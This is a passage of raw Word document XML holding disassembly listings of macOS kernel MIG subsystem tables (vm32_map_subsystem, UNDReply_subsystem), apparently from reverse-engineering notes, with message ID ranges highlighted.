    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E051B8                 dd 0FFFFFF80h           ; routine.descr_count</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E051B8                 dq 4                    ; routine.arg_descr</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E051B8                 dd 0                    ; routine.max_reply_msg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E051B8                 db 4 dup(0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E051B8                 dq 2C00000000h          ; routine.impl_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E051B8                 dq 0                    ; routine.stub_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E051B8                 dd 0                    ; routine.argc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E051B8                 dd 3C19A0h              ; routine.descr_count</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E051B8                 dq 4FFFFFF80h           ; routine.arg_descr</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E051B8                 dd 0                    ; routine.max_reply_msg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E051B8                 db 4 dup(0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E051B8                 dq 0                    ; routine.impl_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E051B8                 dq 3B0h                 ; routine.stub_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>__const:FFFFFF8000E051B8                 dd 0                    ; routine.argc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E051B8                 dd 0                    ; routine.descr_count</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRDefault="00D060FE" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>vm32_map_subsystem</w:t>
      </w:r>
      <w:r w:rsidR="00ED4A5C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E05638                 public vm32_map_subsystem_0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E05638 ; const vm32_map_subsystem vm32_map_subsystem_0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E05638 vm32_map_subsystem_0 dq offset map_server_routine; server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E05638                                         ; DATA XREF: map_server_routine:loc_FFFFFF80003C56C2o</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E05638                                         ; map_server+80o ...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">__const:FFFFFF8000E05638                 dd </w:t>
      </w:r>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>0ED8h</w:t>
      </w:r>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                ; start</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">__const:FFFFFF8000E05638                 dd </w:t>
      </w:r>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">0EF7h </w:t>
      </w:r>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">               ; end</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E05638                 dd 82Ch                 ; maxsize</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E05638                 db 4 dup(0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E05638                 dq 0                    ; reserved</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E05638                 dq 0                    ; routine.impl_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E05638                 dq offset _Xregion      ; routine.stub_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E05638                 dd 7                    ; routine.argc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E05638                 dd 0                    ; routine.descr_count</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E05638                 dq 0                    ; routine.arg_descr</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E05638                 dd 70h                  ; routine.max_reply_msg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E05638                 db 4 dup(0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E05638                 dq 0                    ; routine.impl_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E05638                 dq 3C597000000000h      ; routine.stub_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E05638                 dd 0FFFFFF80h           ; routine.argc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E05638                 dd 4                    ; routine.descr_count</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E05638                 dq 0                    ; routine.arg_descr</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>__const:FFFFFF8000E05638                 dd 0                    ; routine.max_reply_msg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E05638                 db 30h, 3 dup(0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E05638                 dq 30h                  ; routine.impl_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E05638                 dq 0                    ; routine.stub_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E05638                 dd 3C5B40h              ; routine.argc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E05638                 dd 0FFFFFF80h           ; routine.descr_count</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E05638                 dq 3                    ; routine.arg_descr</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E05638                 dd 0                    ; routine.max_reply_msg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E05638                 db 4 dup(0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E05638                 dq 2C00000000h          ; routine.impl_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E05638                 dq 0                    ; routine.stub_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E05638                 dd 0                    ; routine.argc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E05638                 dd 3C5CB0h              ; routine.descr_count</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E05638                 dq 5FFFFFF80h           ; routine.arg_descr</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E05638                 dd 0                    ; routine.max_reply_msg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E05638                 db 4 dup(0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E05638                 dq 0                    ; routine.impl_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E05638                 dq 2Ch                  ; routine.stub_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E05638                 dd 0                    ; routine.argc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E05638                 dd 0                    ; routine.descr_count</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRDefault="00D060FE" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">UNDReply_subsystem </w:t>
      </w:r>
      <w:r w:rsidR="00ED4A5C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E01240                 public UNDReply_subsystem_0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E01240 ; const UNDReply_subsystem UNDReply_subsystem_0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E01240 UNDReply_subsystem_0 dq offset UNDReply_server_routine; server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E01240                                         ; DATA XREF: UNDReply_server_routine:loc_FFFFFF80002CFF52o</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
